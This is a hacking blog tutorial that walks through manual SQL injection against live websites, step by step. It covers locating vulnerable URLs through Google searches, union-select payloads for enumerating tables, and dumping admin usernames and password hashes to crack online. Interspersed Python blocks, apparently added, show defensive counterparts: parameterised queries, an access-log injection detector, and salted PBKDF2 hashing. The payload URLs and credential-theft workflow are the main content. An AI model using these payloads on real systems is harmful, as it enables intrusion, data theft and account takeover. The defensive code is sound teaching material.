Website Hacking : Step By Step Manual SQL Injection

By Ajay Verma - Monday, 14 July 2014 No Comments
Hello friends, once again I am here to explain SQL injection in more detail, on your request.
I already shared a website hacking (authentication bypass) by SQL injection tutorial, but this time, on your request, I am going to explain step-by-step manual SQL injection in a little more depth.
So let's start from the beginning :) by defining what SQL and SQL injection are.

SQL stands for Structured Query Language. It is a high-level language in which queries such as SELECT, INSERT, DELETE and UPDATE are used to select, add, delete and update data respectively. SQL is used to design databases, and the information is stored in those databases.
SQL injection is a vulnerability occurring in the database layer of an application which allows an attacker to see the contents stored in the database. This vulnerability occurs when the user's input is not filtered, or is improperly filtered, before it is placed into a query.


Now you want to ask: what can a hacker do with an SQL injection attack?
Well, a hacker can do the following operations by SQL injection:
* Bypassing logins
* Accessing secret data
* Modifying contents of the website
* Shutting down the MySQL server

Step 1- Finding a Vulnerable Website:
SQL injection starts with a vulnerable URL. What does it look like? Well, consider the example below:
http://unknowndevice64.info/something.php?variable=(some value)

You can find several URLs of this type by Google. :)

Step 2- Checking the Vulnerability:
How do you test whether it is vulnerable or not?
It's simple: attach a single quote (') at the end of (some value), i.e. 64', so the URL will look like:
http://unknowndevice64.info/something.php?id=64'
If the page stays the same or shows "page not found", then it is not vulnerable.
If you get an error message like the one below, it means that the site is vulnerable:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
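The definition above (unfiltered input reaching the query) and the single-quote check in step 2 are two views of the same defect. The following is an added example, not code from the original post: a Python stand-in for something.php that pastes the id parameter into the SQL text and echoes the database error, next to a hardened version that validates and binds the parameter. The table, its rows and the sqlite3 backend are constructed for the example; the post targets MySQL, where the error text differs but the mechanism is identical.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's database (sample rows, not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO articles VALUES (?, ?)",
        [(1, "first post"), (2, "second post"), (64, "post sixty-four")],
    )
    conn.commit()
    return conn


def vulnerable_lookup(conn, id_param):
    """Behaves like the something.php?id=... page in the post: the raw parameter is
    concatenated into the SQL text, and the database's own error message is sent
    back to the client. A trailing quote therefore produces the syntax error that
    step 2 uses as its vulnerability indicator."""
    sql = "SELECT id, title FROM articles WHERE id=" + id_param
    try:
        return {"rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        # Echoing the parser's complaint is what turns a bug into a confirmed finding.
        return {"rows": [], "error": str(exc)}


def hardened_lookup(conn, id_param):
    """Same lookup with two fixes: the parameter must parse as an integer, and it is
    bound as a value rather than pasted into the statement, so a quote, an
    'order by' or a 'union select' never reaches the SQL parser. Any failure is
    reported to the client as a generic message, never as database error text."""
    try:
        article_id = int(id_param)
    except ValueError:
        return {"rows": [], "error": "invalid request"}
    rows = conn.execute(
        "SELECT id, title FROM articles WHERE id=?", (article_id,)
    ).fetchall()
    return {"rows": rows, "error": None}


if __name__ == "__main__":
    db = make_db()
    for probe in ("64", "64'"):
        print(repr(probe), "vulnerable:", vulnerable_lookup(db, probe))
        print(repr(probe), "hardened:  ", hardened_lookup(db, probe))
```

Run it and the vulnerable handler returns the row for `64` but raises an `unrecognized token` error for `64'`; the hardened handler answers the same row for `64` and a flat `invalid request` for anything that is not an integer, so the probe in step 2 learns nothing about the database behind the page.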

Step 3- Finding the Number of Columns:
Our next step is to find the number of columns present in the target database.
For that, replace the single quote (') with an "order by n" statement.
Change n from 1, 2, 3, 4, ... n until you get an error like "unknown column".
For eg:
http://unknowndevice64.info/id.php?id=2 order by 1
http://unknowndevice64.info/id.php?id=2 order by 2
http://unknowndevice64.info/id.php?id=2 order by 3 
If you get the error while trying the "x"th number, then the number of columns is "x-1".
I mean to say:
http://unknowndevice64.info/id.php?id=2 order by 1(noerror)
http://unknowndevice64.info/id.php?id=2 order by 2(noerror)
http://unknowndevice64.info/id.php?id=2 order by 3(error)

So now x=3, and the number of columns is x-1, i.e. 2.
In case the above method fails to work for you, try adding "--" at the end of the statement.
For eg:
http://unknowndevice64.info/id.php?id=2 order by 1--

Step 4- Finding the Vulnerable Columns:
We have successfully discovered the number of columns present in the target database. Let us find the vulnerable column by trying the query "union select columns_sequence".
Change the id value to negative (I mean id=-2). Replace columns_sequence with the numbers from 1 to x-1 (the number of columns), separated with commas (,).
For eg:
If the number of columns is 4, then the query is as follows:
http://unknowndevice64.info/id.php?id=-2 union select 1,2,3,4--

If the above method is not working then try this:
http://unknowndevice64.info/id.php?id=-2 and 1=2 union select 1,2,3,4--      

Once you execute the query, the page will display the vulnerable column.
--------PIC-----
Bingo, columns '3' and '7' are found to be vulnerable. Let us take the first vulnerable column, '3'. We can inject our query in this column.

Step 5- Finding the Version, Database and User:
Replace the 3 in the query with "version()".

For eg:
http://unknowndevice64.info/id.php?id=-2 and 1=2 union select 1,2,version(),4--

Now it will display the version as 5.0.1 or 4.3, something like this.
Replace version() with database() and user() to find the database and the user respectively.
For eg:
http://unknowndevice64.info/id.php?id=-2 and 1=2 union select 1,2,database(),4--
http://unknowndevice64.info/id.php?id=-2 and 1=2 union select 1,2,user(),4--

If the above is not working, then try this:

http://unknowndevice64.info/id.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4--

Step 6- Finding the Table Name:
This step works if the database version is 5 or above. If the version is 4.x, then you have to guess the table names (blind SQL injection attack).
Let us find the table names of the database. Replace the 3 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()".
For eg:
http://unknowndevice64.info/id.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--

Now it will display the list of table names. Find the table name which is related to the admin or user.
----PIC---
Let us choose the "admin" table.
Step 7- Finding the Column Name:
Similarly, get all the columns by simply replacing 'table' with 'column'.
For eg:
http://unknowndevice64.info/id.php?id=-130 union select all 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database()--
There is a repeating element, in this case 'id'. From it, we come to know which table has which columns.
----PIC---

Step 8- Fetching Data from Columns:
We can fetch the data stored in any column, but the interesting ones here are username and password.
These columns are in the first table, that is tar_admin. "0x3a" is the hex of a colon; it is used simply to insert a colon into the result to separate the values.
For eg:
http://unknowndevice64.info/id.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4 from tar_admin--

----PIC---
So finally we got the usernames and passwords on screen. But the passwords may be encrypted.
Mostly these encryptions can be decrypted, as several online decryption websites/tools are available. :)
----PIC---
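Seen from the server side, the sequence in steps 2 through 8 (a stray quote, a run of "order by n" requests, then "union select" against information_schema) leaves a distinctive trail in the web server's access log. The following added example, which is not code from the original post, scans constructed Apache-style combined log lines for those indicators and flags any client that walks through the order-by sequence. The IP addresses, timestamps and requests are made up for the example and mirror the URLs in the post.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed combined-format access log lines (not a real capture); the
# requests follow the URLs shown in steps 2, 3 and 6 of the post.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Jul/2014:10:00:01 +0000] "GET /id.php?id=2 HTTP/1.1" 200 4312',
    '203.0.113.5 - - [14/Jul/2014:10:00:05 +0000] "GET /id.php?id=2%27 HTTP/1.1" 200 512',
    '203.0.113.5 - - [14/Jul/2014:10:00:09 +0000] "GET /id.php?id=2+order+by+1-- HTTP/1.1" 200 4312',
    '203.0.113.5 - - [14/Jul/2014:10:00:12 +0000] "GET /id.php?id=2+order+by+2-- HTTP/1.1" 200 4312',
    '203.0.113.5 - - [14/Jul/2014:10:00:15 +0000] "GET /id.php?id=2+order+by+3-- HTTP/1.1" 200 510',
    '203.0.113.5 - - [14/Jul/2014:10:00:40 +0000] "GET /id.php?id=-2+and+1=2+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 4400',
    '198.51.100.7 - - [14/Jul/2014:10:01:00 +0000] "GET /id.php?id=7 HTTP/1.1" 200 4100',
]

# host ident user [timestamp] "METHOD path proto" status bytes
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# One pattern per stage of the manual technique described in the post.
INDICATORS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),            # step 3
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),     # steps 4-8
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),           # steps 6-7
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),             # steps 6-8
    "db_fingerprint": re.compile(r"\b(version|database|user)\s*\(\)|@@version", re.I),  # step 5
    "comment_terminator": re.compile(r"(--|#)\s*$"),                     # trailing "--"
}


def parse_line(line):
    """Split one log line into fields and URL-decode the query string so that
    %27 and '+' are matched as the quote and spaces the attacker actually sent."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["query"] = unquote_plus(urlsplit(rec["path"]).query)
    return rec


def classify(query):
    """Return the names of every indicator present in a decoded query string."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(query)]
    if query.count("'") % 2 == 1:  # an odd number of quotes: the step-2 probe
        hits.append("unbalanced_quote")
    return hits


def scan(lines):
    """Produce one alert record per log line that carries any indicator."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec["query"])
        if hits:
            alerts.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                           "query": rec["query"], "indicators": hits})
    return alerts


def probing_clients(alerts, threshold=3):
    """Clients that issued at least `threshold` 'order by n' requests: the
    column-counting walk of step 3, which no ordinary visitor performs."""
    counts = Counter(a["ip"] for a in alerts if "order_by_probe" in a["indicators"])
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for alert in found:
        print(alert["ip"], alert["status"], alert["indicators"], alert["query"])
    print("column-count probing from:", probing_clients(found))
```

Decoding before matching matters: the quote in step 2 arrives as `%27` and the spaces in `order by` as `+`, so a pattern applied to the raw path misses both. The response size is kept in each alert because, as the post itself relies on, the page that errors is usually noticeably smaller than the page that renders.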

Note: Hashes are a type of encryption which is irreversible. There are numberless online crackers available. Keep trying. Sometimes very strong hashes cannot be cracked.
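Whether the values obtained in step 8 are usable comes down to how the site stored them. A fast, unsalted hash such as MD5 maps each password to one fixed string, which is exactly what online lookup services index; a salted, iterated derivation gives every stored password its own value and makes each guess expensive. The added example below is not from the original post; it contrasts the two in Python with the standard library, and the password strings and the iteration count are constructed for the example.

```python
import hashlib
import hmac
import os

# Assumed PBKDF2-HMAC-SHA256 work factor for this example; tune to the hardware.
ITERATIONS = 200_000


def unsalted_md5(password):
    """The storage style many older PHP sites used: identical passwords give
    identical hashes, so one precomputed table serves every site and every user."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password, salt=None):
    """Derive a stored record 'pbkdf2_sha256$iterations$salt$digest'. A fresh
    random salt per password means equal passwords never share a stored value."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256${}${}${}".format(ITERATIONS, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute the derivation with the stored salt and iteration count and
    compare in constant time."""
    try:
        algo, iters, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("md5 x2:   ", unsalted_md5("example-pass"), unsalted_md5("example-pass"))
    print("pbkdf2 x2:", hash_password("example-pass"))
    print("          ", hash_password("example-pass"))
```

Running it prints two identical MD5 strings and two different PBKDF2 records for the same input; the iteration count is stored alongside the salt so it can be raised later without invalidating existing records.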

Where is the login panel or login page of the website?
So you got the key; where is the lock now? Most websites have login pages at default locations.
You can find admin login pages by using my tool, Admin Finder.

Hope you like this tutorial. For any other cyber help or query, please comment below or you can write to me. :)
unknowndevice64